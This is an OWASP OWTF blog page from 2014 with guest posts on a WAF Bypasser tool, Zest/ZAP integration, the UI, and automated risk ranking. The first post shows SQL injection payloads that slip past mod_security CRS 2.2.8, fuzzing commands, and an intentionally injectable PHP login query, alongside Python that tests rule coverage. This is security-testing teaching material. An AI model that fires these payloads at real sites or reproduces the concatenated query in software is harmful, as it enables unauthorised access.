Tuesday, 4 November 2014

OWTF 1.0 "Lionheart": OWTF's WAF bypasser!

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Marios Kourtesis, who authored one of the sexiest GSoC 2014 projects this year: WAF Bypasser. An epic joint venture between two OWASP projects: OWASP ByWaf and OWASP OWTF.

NOTE: WAF Bypasser is a tool that can be used both from inside of OWTF as well as a standalone tool, you will keep seeing this theme in upcoming cool projects ;)

And with that, a big welcome and THANK YOU to Marios!

OWTF WAF-Bypasser

Web application security is moving to another level. Hardware and software implementations of application firewalls are being deployed to secure web infrastructure. These technologies put effort into delivering more secure web applications; unfortunately, what they really deliver is far from what they promise. In many cases a WAF increases the attack surface by introducing new vulnerabilities. WAFs can be easily bypassed, leaving systems exposed while the defenders feel secure.
WAF-Bypasser is a tool that assists penetration testers in testing the quality of a WAF (Web Application Firewall) or of a poorly written WAF rule, and potentially bypassing it. It is developed both as an auxiliary OWASP OWTF plugin and as a standalone project. It is worth pointing out that some zero-day exploits were found during the research and development.[1]

In this article I demonstrate how to analyze and bypass the mod_security WAF protected with OWASP CRS version 2.2.8. The exploit has also been tested against version 2.2.9 and works there as well.
For the demonstration I use DigitalOcean's configuration and examples[2] (see the article in the references; it is important to read it in order to follow this post). My target is a fully updated Ubuntu system with the latest modsecurity package installed.
The problem:
The Ubuntu mod_security package contains OWASP CRS version 2.2.8.

Step 1)
WAF Bypasser depends on the Tornado framework. Install it on your system as you usually do.
Step 2)
Detecting the blocked characters:
We need to specify the following:
  • The target URL.
  • The way I will detect that a request is blocked. mod_security responds to blocked HTTP requests with a 403 HTTP error code, so in my case I specify that blocked requests are detected by response code.
  • The POST data, with the variable that I want to fuzz marked.
  • The scanning mode for detecting the allowed characters. Additionally, this mode attempts to bypass the WAF by encoding the characters, among other tricks.

Putting all together:

python wafbypasser.py --target  --data "login=1&username=@@@fuzzhere@@@"
--response_code 403 --mode detect_chars

In the following screenshot we can see that the " and ' characters, among others, are detected by the WAF.
(Finding detected characters)

Scrolling down the output, the next screenshot shows that we can pass the ' (single quote) character through by placing it between two undetected characters.
(undetected quotes, small bypass)
' is detected
a'a is not detected
a' is detected
'a is detected
Note: The [a] character was found by WAF Bypasser to be an undetected character.

Step 3)
Exploiting the target:
As we can see from the MySQL query and the logic of this super vulnerable authentication system, the only thing we need to do is make the query return true.
// Vulnerable on purpose: user input is concatenated straight into the SQL string.
$result = mysqli_query($con, "SELECT * FROM `users` WHERE username='$username' AND password='$password'");
if (mysqli_num_rows($result) == 0)
    echo 'Invalid username or password';
else
    echo '<h1>Logged in</h1><p>A Secret for you....</p>';

Keeping in mind that the WAF will not block a detected character surrounded by undetected characters, and that the space character is not in the list of detected characters, let's manually write some payloads that will make the SQL query return true.
vim payloads.txt

a' or '1'='1' or 'a
a' or ' 1 ' = ' 1 ' or 'a
a' or '2'='2' or 'a
a' or true or 'a
a' or not false or 'a
a' or not  '1'='2' or 'a

Now let's fuzz the target with our payloads.
In fuzzing mode we need to specify the file with the payloads; in my case, payloads.txt.

python wafbypasser.py --target --data "login=1&username=@@@fuzzhere@@@" --response_code 403 --mode fuzz --payloads payloads.txt

In the screenshot we see that we found 2 bypasses. In the lower part of the image we test one of the undetected payloads using curl, and the results show that we have successfully bypassed the WAF and performed an SQL injection that let us log in to our vulnerable web application, just as we would have without the WAF in place.
(fuzzing the target)
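The detect_chars / sandwich / fuzz methodology above, as an added Python example (not WAF Bypasser's own code): a WAF operator can run the same check against a candidate rule before trusting it. The two regexes are constructed to model the behaviour seen in the screenshots (a quote flagged only at the edge of the value) and are not the real CRS rules; the 403 check is replaced by a local regex match.

```python
import re

# Constructed stand-ins for a WAF rule; they are NOT the OWASP CRS 2.2.8 rules.
# WEAK_RULE models the gap observed in the post: a quote is only flagged when
# it sits at the start or end of the fuzzed value, so a'a slips through.
WEAK_RULE = re.compile(r"""^['"]|['"]$""")
# STRICT_RULE flags a quote anywhere in the value, closing that gap.
STRICT_RULE = re.compile(r"""['"]""")

PRINTABLE = [chr(c) for c in range(0x20, 0x7F)]


def is_blocked(rule, value):
    """Stand-in for 'the WAF answered 403' (the --response_code 403 check)."""
    return rule.search(value) is not None


def detect_chars(rule):
    """detect_chars mode: probe each printable character on its own and
    return the set the rule blocks."""
    return {ch for ch in PRINTABLE if is_blocked(rule, ch)}


def sandwich_gaps(rule, detected, filler="a"):
    """Re-test every detected character between two undetected ones (the a'a
    pattern from the post). Anything returned is a coverage gap in the rule."""
    assert filler not in detected
    return {ch for ch in detected if not is_blocked(rule, filler + ch + filler)}


# The payloads from payloads.txt above, with plain ASCII quotes.
PAYLOADS = [
    "a' or '1'='1' or 'a",
    "a' or ' 1 ' = ' 1 ' or 'a",
    "a' or '2'='2' or 'a",
    "a' or true or 'a",
    "a' or not false or 'a",
    "a' or not  '1'='2' or 'a",
]


def fuzz(rule, payloads):
    """fuzz mode: return the payloads the rule lets through."""
    return [p for p in payloads if not is_blocked(rule, p)]


if __name__ == "__main__":
    for name, rule in (("weak", WEAK_RULE), ("strict", STRICT_RULE)):
        blocked = detect_chars(rule)
        print(name, "blocks", sorted(blocked), "gaps", sorted(sandwich_gaps(rule, blocked)),
              "payloads passing:", len(fuzz(rule, PAYLOADS)))
```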


[2] "How to set up mod_security with apache on debian-ubuntu", URL: https://www.digitalocean.com/community/tutorials/how-to-set-up-mod_security-with-apache-on-debian-ubuntu

Demos / talks:

Monday, 27 October 2014

OWTF 1.0 "Lionheart": Zest support and ZAP integration

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Deep 'dscarson' Shah, who authored one of the most amazing GSoC 2014 projects this year: Zest support and ZAP integration.

And with that, a big welcome and THANK YOU to Deep!

OWASP OWTF - Zest support and ZAP integration
As part of my GSoC project, I had to integrate Mozilla Zest and OWASP ZAP into OWTF.

This image summarizes my work:

Let's dive into the details:

Zest is an experimental, specialized scripting language developed by the Mozilla security team, intended for use in web-oriented security tools.
Generating Zest scripts from OWTF provides an automated mechanism to replicate the exploitation of security vulnerabilities in a format that facilitates information exchange between tools such as ZAP and others, which can then reproduce the same vulnerabilities in their own environment.

ZAP is an easy-to-use integrated penetration-testing tool for finding vulnerabilities in web applications, and it has built-in functionality to run Zest scripts.
ZAP support allows OWTF to export its HTTP transactions to OWASP ZAP for further analysis and fuzzing.

The features implemented are:

  • Zest script creation from a single HTTP transaction
  • Zest script creation from multiple HTTP transactions (macro of requests)
  • HTTP request editing window (from which you can replay the request)
  • Zest script console
  • "Record a Zest script" functionality
  • Zest script runner
  • Forward HTTP request to ZAP

1) Zest script creation from a single HTTP transaction:

Clicking the "Create a Zest Script" button creates a Zest script for the given transaction in the owtf_review/targets/given_target/zest directory.

2) Zest script creation from multiple HTTP transactions:

A single Zest script can be created from multiple transactions of a specific target.

Clicking the "Create Zest Script" button lets you select the transactions you want to include in the Zest script, which is written to the owtf_review/targets/given_target/zest directory.
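What a generated script of this kind looks like, as an added example (not the project's own zest-owtf code): one ZestRequest statement per transaction, each asserting the status code originally observed, so ZAP can replay the macro and flag any divergence. The transactions are constructed, and the Zest field names follow the Zest JSON format as I know it, so treat them as an assumption.

```python
import json

# Constructed sample transactions (not captured from any real target); the dict
# shape is assumed for this example and is not OWTF's transaction model.
TRANSACTIONS = [
    {"method": "GET", "url": "http://target.example/login",
     "headers": "Host: target.example\r\n", "data": "", "status": 200},
    {"method": "POST", "url": "http://target.example/login",
     "headers": "Host: target.example\r\nContent-Type: application/x-www-form-urlencoded\r\n",
     "data": "login=1&username=alice&password=secret", "status": 302},
]


def zest_request(tx, index):
    """One ZestRequest statement that replays the transaction and asserts that
    the replay returns the status code originally observed."""
    return {
        "elementType": "ZestRequest",
        "index": index,
        "url": tx["url"],
        "method": tx["method"],
        "headers": tx["headers"],
        "data": tx["data"],
        "assertions": [{
            "elementType": "ZestAssertion",
            "rootExpression": {"elementType": "ZestExpressionStatusCode",
                               "code": tx["status"], "not": False},
        }],
    }


def zest_script(title, transactions):
    """A ZestScript with one statement per transaction; with several
    transactions this is the 'macro of requests' described above."""
    return {
        "elementType": "ZestScript",
        "zestVersion": "0.3",
        "title": title,
        "statements": [zest_request(tx, i + 1) for i, tx in enumerate(transactions)],
    }


def script_json(title, transactions):
    """The JSON text that would be written to the zest directory."""
    return json.dumps(zest_script(title, transactions), indent=2)


if __name__ == "__main__":
    print(script_json("login macro", TRANSACTIONS))
```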

3) HTTP request editing window (replay function)

An editing window, similar to ZAP's, in which you modify a particular request and get the response for the edited version.

1) Select View on the transaction you wish to edit and replay.
2) Click Replay.
3) Edit the request.
4) Click Send.

4) Zest scripting console

A new window where all the target scripts and recorded scripts are listed and can be viewed.

You can reach the Zest console from the transaction_log window by clicking 'Zest Script Console'.

5) Record functionality

Records the transactions while you browse the web through the OWTF proxy and creates a Zest script from the recorded transactions, similar to the "record a Zest script" functionality in ZAP.

  1. Go to the Zest console and click the 'Record a Zest Script' button
  2. Now browse the web
  3. Hit 'Stop recording' when done

A Zest script will be created in the owtf_review/misc/recorded_scripts/ directory.

6) Zest running functionality

Runs a Zest script from the Zest console and displays its output there.

Click 'Run the Zest Script' in the Zest console.

7) Forward HTTP request to ZAP

Forwards HTTP requests to ZAP for analysis and testing purposes.

Just click 'Forward to ZAP' in the particular transaction window (make sure ZAP is running).

Resources:

Project wiki pages (with diagrams)

Documentation of the companion project (zest-owtf):

A video showing all the features of this GSoC project:

Friday, 17 October 2014

OWTF 1.0 "Lionheart": UI and Database

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Bharadwaj 'tunnelshade' Machiraju, who devised and implemented the UI and Database idea from conception to implementation, full props to you, my friend :)

And with that, a big welcome and THANK YOU to Bharadwaj!

OWASP OWTF - User Interface and Database support

How OWTF used to be?

OWTF was initially a CLI program that produced an interactive HTML report. Though OWTF was highly configurable, its usability was limited by huge configuration files.


What was done during this project?

The project had one main goal, i.e. to build an interface from which all aspects of OWTF can be controlled. This involved more than a few challenges:

  • Refactoring the codebase to make use of a database.
  • Building a RESTful API to make the interface interactive.
  • Creating a web interface on top of the REST API.
  • Extending control over plugin execution (or worker processes, as we call it).

The technology stack which was finalized for this project:

  • Tornado (for interface and api servers)
  • Postgresql (for database)
  • SQLAlchemy (for ORM)

How does OWTF look now?

After the completion, OWTF only has to be launched from the command line; everything else can be done from the web interface. The following screenshots will take you on a tour, but for detailed explanations, a visit to our user docs is required (http://docs.owtf.org/en/latest/usage.html).

Target Manager

Plugin Launcher

Target Report
Plugin Report

Transaction Log

Worker Manager


Worklist Manager


Wednesday, 15 October 2014

OWTF 1.0 "Lionheart": Brucon 5x5 video, slides and more

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

Just a quick note to say that the materials used by the OWTF Crew during the Brucon 5x5 presentations are now online:

Slides here:

OWTF 1.0 "Lionheart" - Brucon 5x5 Video:

Talk structure and higher resolution demos
    1. (From minute: 0) Introduction to OWTF and discussion of the Web UI, REST API and DB by Bharadwaj Machiraju (higher resolution: OWTF UI Demo)
    2. (From minute: ~15:50) Discussion of WAF Bypasser AND OWTF Botnet mode by Marios Kourtesis (higher resolution: WAF Bypasser fuzzing demo, WAF Bypasser detect allowed characters)
    3. (From minute: ~24:50) OWTF re-architecture by Alessandro Fanio González
On top of this, Bharadwaj became the Brucon 2014 Lightning talk winner with his awesome talk about Flashbang, which he developed for Cure53. The talk is now public and you can watch it here:
Congratulations Bharadwaj, you rock! ;)

Friday, 10 October 2014

OWTF 1.0 "Lionheart": Automated Rankings

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Tao 'depierre' Sauvage, who authored one of the most successful GSoC 2014 projects for OWASP OWTF this year: OWASP OWTF: Automated Rankings

Helicopter view:
Ever had to test 30 URLs in 5 days and wondered where to start? OWTF will now take the MAX severity from ALL tools run against EACH target and tell you where :)

And with that, a big THANK YOU and welcome to Tao! :)


Thanks to GSoC, I had the opportunity to work on the OWASP OWTF project. My task consisted of implementing an automated ranking system, but first of all, let us have a quick overview of OWTF.

As you surely know, because you are reading this blog, OWTF is a framework that helps users -- whether a security expert or an unsavvy but curious person -- with security assessments. It takes care of the unpleasant part of the job and automatically generates an interactive report containing all the information for the selected plugins.

The powerful feature here is the interactive report. In a few words, instead of producing a report that cannot be modified (like Skipfish or w3af, for instance), OWTF takes the user's actions into account. For instance, it might be useful to add a screenshot for plugin XY to clearly show the SQL injection that was found, and you can!


But before GSoC began, the user had to manually evaluate the security risk for each plugin. If you had an assessment covering 30 different websites, that would take a lot of time. Therefore the need showed up by itself: OWTF needed to pre-evaluate the security risk of its plugins' findings.

The ranking system

By the end of GSoC, the automated ranking system had been completed and integrated into OWTF, good news for its users.

It has been developed following the simple rules below:

1. OWTF's ranking scale is Unranked/No risk, Informational, Low, Medium, High and Critical risk (6 different values).
2. OWTF cannot automatically rank an output higher than High.
3. Automated rankings are highlighted as such.
4. The user is able to confirm/override the ranking.
5. Once the ranking has been confirmed/overridden, the highlight is removed.

The first rule is kind of obvious; it is based on the most common scales used by security tools.


6 available rankings

The second rule is more interesting. We, the OWASP contributors, decided that only the user is able to correctly estimate a critical risk, because they are the only ones aware of all the parameters, such as the application context.

Highlight of the Critical ranking

Let's say that tool XY found an SQL injection on target AB. According to most vulnerability scoring schemes, such a discovery is rated as really hazardous. On the other hand, OWTF cannot know what the database contains or whether its information is critical. Therefore, instead of raising the big red Critical flag, it ranks the discovery as High and lets the user decide whether it deserves a higher or lower ranking.
Difference between an automated ranking and a confirmed one

The last three rules were chosen according to OWTF's philosophy, which is to have interactive reports. The automated ranking system therefore renders its rankings more transparent than the ones set by the user. That way, a quick look at the report lets them see what has been found and who found it.
Example of OWTF with its new automated ranking system

As a visual result, OWTF's automated ranking system will save the users a lot of time. On the report above, a fraction of a second is enough to understand which security aspect should be reviewed first.
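The five rules and the per-target maximum from the helicopter view, as an added Python example (not ptp's or OWTF's own code): the severity-label mapping and the sample findings are constructed, using plugin codes that appear in this post.

```python
from enum import IntEnum


class Rank(IntEnum):
    """OWTF's six-value scale (rule 1), ordered so max() picks the most severe."""
    UNRANKED = 0
    INFO = 1
    LOW = 2
    MEDIUM = 3
    HIGH = 4
    CRITICAL = 5


# Constructed mapping from the severity words a tool might print to the scale.
# (ptp's real parsers are per tool; this is only a stand-in.)
LABELS = {"info": Rank.INFO, "low": Rank.LOW, "medium": Rank.MEDIUM,
          "high": Rank.HIGH, "critical": Rank.CRITICAL}


def auto_rank(label):
    """Rule 2: an automated ranking is capped at High, whatever the tool said;
    an unknown label stays Unranked rather than guessing."""
    return min(LABELS.get(label.lower(), Rank.UNRANKED), Rank.HIGH)


class Finding:
    def __init__(self, target, plugin, tool_label):
        self.target, self.plugin = target, plugin
        self.rank = auto_rank(tool_label)
        self.automated = True          # rule 3: highlighted as automated

    def confirm(self, rank=None):
        """Rules 4 and 5: the user confirms or overrides; only here may
        Critical be assigned, and the highlight is removed."""
        if rank is not None:
            self.rank = Rank(rank)
        self.automated = False


def worst_per_target(findings):
    """The helicopter view: max severity over all plugins for each target."""
    worst = {}
    for f in findings:
        worst[f.target] = max(worst.get(f.target, Rank.UNRANKED), f.rank)
    return worst


def triage_order(findings):
    """Targets in the order they should be reviewed (most severe first)."""
    worst = worst_per_target(findings)
    return sorted(worst, key=lambda t: worst[t], reverse=True)


# Constructed sample: three targets with a few plugin outputs each.
SAMPLE = [
    Finding("AB", "OWTF-WVS-001", "critical"),   # scanner says critical: capped to High
    Finding("AB", "OWTF-IG-001", "info"),
    Finding("CD", "OWTF-CM-008", "medium"),
    Finding("EF", "OWTF-WVS-006", "bogus"),      # unknown label stays Unranked
]
```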

Current development state

At the time of writing, OWTF's automated ranking system supports a handful of tools and can rank up to 103 different plugins. The following table describes which plugins are ranked:
Supported tools / number of possible corresponding plugins:
  • 1 plugin (OWTF-WVS-001)
  • 12 plugins
  • 85 plugins
  • 1 plugin (OWTF-CM-008)
  • 1 plugin (OWTF-IG-001)
  • 1 plugin (OWTF-WVS-006)
  • 1 plugin (OWTF-WVS-004)
  • 1 plugin (OWTF-WVS-003)
Supported plugins that can be ranked by OWTF

Even though 103 seems like a big number, a lot of plugins still have to be supported. The automated ranking system is in early-stage development and will keep growing over time in order to support each and every OWTF plugin.


During the development phase, I decided to export the automated ranking system into a standalone library that I baptized ptp (Pentester's Tools Parser). It means that OWTF's ranking system is reusable by anyone and, to be honest, it is quite easy to embed ptp in your own project.
If you are curious about developing a tool similar to OWTF but you don't want to bother with ranking the discoveries, then have a look at ptp's documentation (linked in the resources section).


Before I let you go back to your activities, here are some useful links that will give you more information on the topic:

If you made it this far, don't miss Tao 'depierre' Sauvage's personal blog here!